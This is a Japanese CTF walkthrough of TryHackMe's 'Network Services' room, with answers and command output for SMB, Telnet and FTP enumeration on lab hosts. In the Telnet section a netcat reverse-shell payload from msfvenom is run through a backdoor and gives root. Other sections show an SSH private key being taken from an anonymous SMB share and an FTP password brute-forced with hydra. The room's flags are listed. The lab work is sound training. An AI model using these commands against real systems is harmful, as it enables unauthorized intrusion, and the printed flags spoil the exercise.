概要
TryHackMe「Network Services」のWalkthroughです。
Task2
Q1.What does SMB stand for?
A.Server Message Block
Q2.What type of protocol is SMB?
A.response-request
Q3.What do clients connect to servers using?
A.TCP/IP
Q4.What systems does Samba run on?
A.Unix
Task6
Q1.Conduct an nmap scan of your choosing, How many ports are open?
nmapでポートスキャンを実行します。
$ nmap 10.10.47.64
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 09:08 EDT
Nmap scan report for 10.10.47.64
Host is up (0.24s latency).
Not shown: 997 closed tcp ports (conn-refused)
PORT STATE SERVICE
22/tcp open ssh
139/tcp open netbios-ssn
445/tcp open microsoft-ds
Nmap done: 1 IP address (1 host up) scanned in 45.70 seconds
3つのポートをスキャンできました。
A.3
Q2.What ports is SMB running on?
ポートスキャンの結果からSMBのポートが分かります。
139/tcp open netbios-ssn
445/tcp open microsoft-ds
A.139/445
Q3.Let's get started with Enum4Linux, conduct a full basic enumeration. For starters, what is the workgroup name?
enum4linuxでSMBの情報を列挙します。
$ enum4linux -a 10.10.47.64
workgroup名が分かりました。
Reconnecting with SMB1 for workgroup listing.
Server Comment
--------- -------
Workgroup Master
--------- -------
WORKGROUP POLOSMB
A.WORKGROUP
Q4.What comes up as the name of the machine?
Hint.Look under OS information, it might be hard to spot!
Q3同様にマシンの名前も分かりました。
A.POLOSMB
Q5.What operating system version is running?
OSの情報を得られました。
[+] Got OS info for 10.10.47.64 from srvinfo:
POLOSMB Wk Sv PrQ Unx NT SNT polosmb server (Samba, Ubuntu)
platform_id : 500
os version : 6.1
server type : 0x809a03
A.6.1
Q6.What share sticks out as something we might want to investigate?
興味深い共有名も得られました。
Sharename Type Comment
--------- ---- -------
netlogon Disk Network Logon Service
profiles Disk Users profiles
print$ Disk Printer Drivers
IPC$ IPC IPC Service (polosmb server (Samba, Ubuntu))
A.profiles
Task4
Q1.What would be the correct syntax to access an SMB share called "secret" as user "suit" on a machine with the IP 10.10.10.2 on the default port?
A.smbclient //10.10.10.2/secret -U suit -p 445
Q3.Does the share allow anonymous access? Y/N?
profilesにアノニマスでパスワードなしログインができました。
$ smbclient //10.10.47.64/profiles -U anonymous
Password for [WORKGROUP\anonymous]:
Try "help" to get a list of possible commands.
smb: \>
A.Y
Q4.Great! Have a look around for any interesting documents that could contain valuable information. Who can we assume this profile folder belongs to?
more "Working From Home Information.txt"でファイルを閲覧します。
John Cactus,
As you're well aware, due to the current pandemic most of POLO inc. has insisted that, wherever
possible, employees should work from home. As such- your account has now been enabled with ssh
access to the main server.
If there are any problems, please contact the IT department at it@polointernalcoms.uk
Regards,
James
Department Manager
A.John Cactus
Q5.What service has been configured to allow him to work from home?
Working From Home Information.txtの内容からSSHサービスだと分かります。
A.ssh
Q6.Okay! Now we know this, what directory on the share should we look in?
SSHの鍵などは.sshディレクトリはいかにあります。
smb: \> ls
.ssh DH 0 Tue Apr 21 07:08:23 2020
A..ssh
Q7.This directory contains authentication keys that allow a user to authenticate themselves on, and then access, a server. Which of these keys is most useful to us?
Hint.What is the default name of an SSH identity file?
SSHの認証では秘密鍵ファイルであるid_rsaが必要です。
A.id_rsa
Q8.What is the smb.txt flag?
id_rsaファイルをダウンロードします。
smb: \.ssh\> get id_rsa
ファイルのパーミッションを変更します。
$ chmod 600 id_rsa
enum4linuxの列挙からユーザー名が判明しました。
[+] Enumerating users using SID S-1-22-1 and logon username '', password ''
S-1-22-1-1000 Unix User\cactus (Local User)
入手した秘密鍵を使用してSSH接続をします。
$ ssh -i id_rsa cactus@10.10.47.64
/home/cactus/smb.txtからフラグを入手できました。
/home/cactus/smb.txt
THM{smb_is_fun_eh?}
A.THM{smb_is_fun_eh?}
Task5
Q1.What is Telnet?
A.application protocol
Q2.What has slowly replaced Telnet?
A.ssh
Q3.How would you connect to a Telnet server with the IP 10.10.10.3 on port 23?
A.telnet 10.10.10.3 23
Q4.The lack of what, means that all Telnet communication is in plaintext?
Hint.*What does the modern internet use to communicate securely? *
A.encryption
Task6
Q1.How many ports are open on the target machine?
Hint.Nmap won't scan all ports by default.
Nmapでポートスキャンを実行します。
$ nmap -Pn -T4 -p- 10.10.72.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 15:56 EDT
Nmap scan report for 10.10.72.68
Host is up (0.24s latency).
Not shown: 65534 closed tcp ports (conn-refused)
PORT STATE SERVICE
8012/tcp open unknown
Nmap done: 1 IP address (1 host up) scanned in 1398.40 seconds
オープンポートがわかりました。
A.1
Q2.What port is this?
8012のポートを検出できました。
A.8012
Q3.This port is unassigned, but still lists the protocol it's using, what protocol is this?
表示されたフィンガープリントからTCPだと分かります。
$ nmap -Pn -T4 -A -p 8012 10.10.230.47
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-20 07:33 EDT
Nmap scan report for 10.10.230.47
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
8012/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|_ SKIDY'S BACKDOOR. Type .HELP to view commands
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port8012-TCP:V=7.94SVN%I=7%D=6/20%Time=6674137B%P=x86_64-pc-linux-gnu%r
SF:(NULL,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20comm
SF:ands\n")%r(GenericLines,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20
SF:to\x20view\x20commands\n")%r(GetRequest,2E,"SKIDY'S\x20BACKDOOR\.\x20Ty
SF:pe\x20\.HELP\x20to\x20view\x20commands\n")%r(HTTPOptions,2E,"SKIDY'S\x2
SF:0BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(RTSPReque
SF:st,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20command
SF:s\n")%r(RPCCheck,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20v
SF:iew\x20commands\n")%r(DNSVersionBindReqTCP,2E,"SKIDY'S\x20BACKDOOR\.\x2
SF:0Type\x20\.HELP\x20to\x20view\x20commands\n")%r(DNSStatusRequestTCP,2E,
SF:"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%
SF:r(Help,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20com
SF:mands\n")%r(SSLSessionReq,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x
SF:20to\x20view\x20commands\n")%r(TerminalServerCookie,2E,"SKIDY'S\x20BACK
SF:DOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(TLSSessionReq,
SF:2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n
SF:")%r(Kerberos,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view
SF:\x20commands\n")%r(SMBProgNeg,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HE
SF:LP\x20to\x20view\x20commands\n")%r(X11Probe,2E,"SKIDY'S\x20BACKDOOR\.\x
SF:20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(FourOhFourRequest,2E,"
SF:SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r
SF:(LPDString,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x2
SF:0commands\n")%r(LDAPSearchReq,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HE
SF:LP\x20to\x20view\x20commands\n")%r(LDAPBindReq,2E,"SKIDY'S\x20BACKDOOR\
SF:.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(SIPOptions,2E,"SKID
SF:Y'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20commands\n")%r(LAN
SF:Desk-RC,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP\x20to\x20view\x20co
SF:mmands\n")%r(TerminalServer,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\x20\.HELP
SF:\x20to\x20view\x20commands\n")%r(NCP,2E,"SKIDY'S\x20BACKDOOR\.\x20Type\
SF:x20\.HELP\x20to\x20view\x20commands\n");
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 167.22 seconds
A.tcp
Q4.Now re-run the nmap scan, without the -p- tag, how many ports show up as open?
全ポート指定が無いとオープンポートは検出できませんでした。
$ nmap -Pn -T4 10.10.72.68
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-19 16:31 EDT
Nmap scan report for 10.10.72.68
Host is up (0.24s latency).
All 1000 scanned ports on 10.10.72.68 are in ignored states.
Not shown: 1000 closed tcp ports (conn-refused)
Nmap done: 1 IP address (1 host up) scanned in 27.40 seconds
A.0
Q6.Based on the title returned to us, what do we think this port could be used for?
出力結果からバックドアに使用されている可能性が高いです。
PORT STATE SERVICE VERSION
8012/tcp open unknown
| fingerprint-strings:
| DNSStatusRequestTCP, DNSVersionBindReqTCP, FourOhFourRequest, GenericLines, GetRequest, HTTPOptions, Help, Kerberos, LANDesk-RC, LDAPBindReq, LDAPSearchReq, LPDString, NCP, NULL, RPCCheck, RTSPRequest, SIPOptions, SMBProgNeg, SSLSessionReq, TLSSessionReq, TerminalServer, TerminalServerCookie, X11Probe:
|_ SKIDY'S BACKDOOR. Type .HELP to view commands
A.a backdoor
Q7.Who could it belong to? Gathering possible usernames is an important step in enumeration.
skidy's backdoorと出力されたのが確認できます。
A.Skidy
Task7
Q2.Great! It's an open telnet connection! What welcome message do we receive?
Hint.Remember, telnet is not running on its default port. Use your answer from task 6, question 2.
Telnetで接続します。
$ telnet 10.10.230.47 8012
Trying 10.10.230.47...
Connected to 10.10.230.47.
Escape character is '^]'.
SKIDY'S BACKDOOR. Type .HELP to view commands
接続するとメッセージが表示されました。
A.SKIDY'S BACKDOOR.
Q3.Let's try executing some commands, do we get a return on any input we enter into the telnet session? (Y/N)
HELPを見ると.RUN <command>でコマンドを実行出来るようですが、実行しても結果は返ってきません。
.HELP: View commands
.RUN <command>: Execute commands
.EXIT: Exit
.RUN ls
A.N
Q6.Now, use the command "ping [local THM ip] -c 1" through the telnet session to see if we're able to execute system commands. Do we receive any pings? Note, you need to preface this with .RUN (Y/N)
Kali側でtcpdumpを使用してパケットをキャプチャします。
$ sudo tcpdump ip proto \\icmp -i tun0
ターゲットマシンからKaliへICMPパケットを送信します。
.RUN ping 10.6.55.144 -c 1
パケットが届きました。
07:54:04.574920 IP 10.10.230.47 > 10.6.55.144: ICMP echo request, id 1266, seq 1, length 64
07:54:04.574947 IP 10.6.55.144 > 10.10.230.47: ICMP echo reply, id 1266, seq 1, length 64
A.Y
Q8.What word does the generated payload start with?
msfvenomでリバースシェルのペイロードを作成します。
$ msfvenom -p cmd/unix/reverse_netcat lhost=[local tun0 ip] lport=4444 R
生成されました。
mkfifo /tmp/dbrn; nc 10.6.55.144 4444 0</tmp/dbrn | /bin/sh >/tmp/dbrn 2>&1; rm /tmp/dbrn
A.mkfifo
Q9.What would the command look like for the listening port we selected in our payload?
Netcatでリッスンします。
$ nc -lvp 4444
A.nc -lvp 4444
Q11.Success! What is the contents of flag.txt?
ターゲットマシン上で先ほどのペイロードを実行します。
.RUN mkfifo /tmp/dbrn; nc 10.6.55.144 4444 0</tmp/dbrn | /bin/sh >/tmp/dbrn 2>&1; rm /tmp/dbrn
rootのシェルを獲得できました。
whoami
root
/root/flag.txtからフラグを入手できます。
cat /root/flag.txt
THM{y0u_g0t_th3_t3ln3t_fl4g}
A.THM{y0u_g0t_th3_t3ln3t_fl4g}
Task8
Q1.What communications model does FTP use?
A.client-server
Q2.What's the standard FTP port?
A.21
Q3.How many modes of FTP connection are there?
アクティブモードとパッシブモードがあります。
A.2
Task9
Q1.How many ports are open on the target machine?
nmapでポートスキャンを実行します。
$ nmap -Pn -sC -A -T4 -sV -p- 10.10.218.201
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-20 08:15 EDT
Warning: 10.10.218.201 giving up on port because retransmission cap hit (6).
Nmap scan report for 10.10.218.201
Host is up (0.28s latency).
Not shown: 65464 closed tcp ports (conn-refused), 70 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
21/tcp open ftp vsftpd 2.0.8 or later
| ftp-anon: Anonymous FTP login allowed (FTP code 230)
|_-rw-r--r-- 1 0 0 353 Apr 24 2020 PUBLIC_NOTICE.txt
| ftp-syst:
| STAT:
| FTP server status:
| Connected to ::ffff:10.6.55.144
| Logged in as ftp
| TYPE: ASCII
| No session bandwidth limit
| Session timeout in seconds is 300
| Control connection is plain text
| Data connections will be plain text
| At session startup, client count was 1
| vsFTPd 3.0.3 - secure, fast, stable
|_End of status
Service Info: Host: Welcome
正解は21と80の2つのポートがオープンしているみたいですが、21しか検出できませんでした。
$ nmap -Pn -sC -A -T4 -sV -p 80 10.10.218.201
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-06-20 08:32 EDT
Nmap scan report for 10.10.218.201
Host is up (0.24s latency).
PORT STATE SERVICE VERSION
80/tcp closed http
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 0.70 seconds
ブラウザで80番ポートを確認しても接続できませんでした。
なぜでしょうか?
A.2
Q2.What port is ftp running on?
ポートスキャンの結果から21番ポートでFTPが確認できます。
A.21
Q3.What variant of FTP is running on it?
vsftpdで動作していることが分かります。
A.vsftpd
Q4.What is the name of the file in the anonymous FTP directory?
anonymousでFTPに接続します。
$ ftp 10.10.218.201
Connected to 10.10.218.201.
220 Welcome to the administrator FTP service.
Name (10.10.218.201:kali): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
テキストファイルを発見しました。
ftp> ls
229 Entering Extended Passive Mode (|||54218|)
150 Here comes the directory listing.
-rw-r--r-- 1 0 0 353 Apr 24 2020 PUBLIC_NOTICE.txt
A.PUBLIC_NOTICE.txt
Q5.What do we think a possible username could be?
PUBLIC_NOTICE.txtを閲覧することでユーザーを推測できました。
PUBLIC_NOTICE.txt
===================================
MESSAGE FROM SYSTEM ADMINISTRATORS
===================================
Hello,
I hope everyone is aware that the
FTP server will not be available
over the weekend- we will be
carrying out routine system
maintenance. Backups will be
made to my account so I reccomend
encrypting any sensitive data.
Cheers,
Mike
A.mike
Task10
Q1.What is the password for the user "mike"?
hydraでmikeのパスワードをクラックします。
$ hydra -f -l mike -P /usr/share/wordlists/rockyou.txt 10.10.218.201 ftp -t 40
パスワードが特定できました。
[21][ftp] host: 10.10.218.201 login: mike password: password
A.password
Q3.What is ftp.txt?
得られた資格情報でFTPにログインします。
$ ftp 10.10.218.201
Connected to 10.10.218.201.
220 Welcome to the administrator FTP service.
Name (10.10.218.201:kali): mike
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp>
ftp.txtからフラグを入手できます。
ftp.txt
THM{y0u_g0t_th3_ftp_fl4g}
A.THM{y0u_g0t_th3_ftp_fl4g}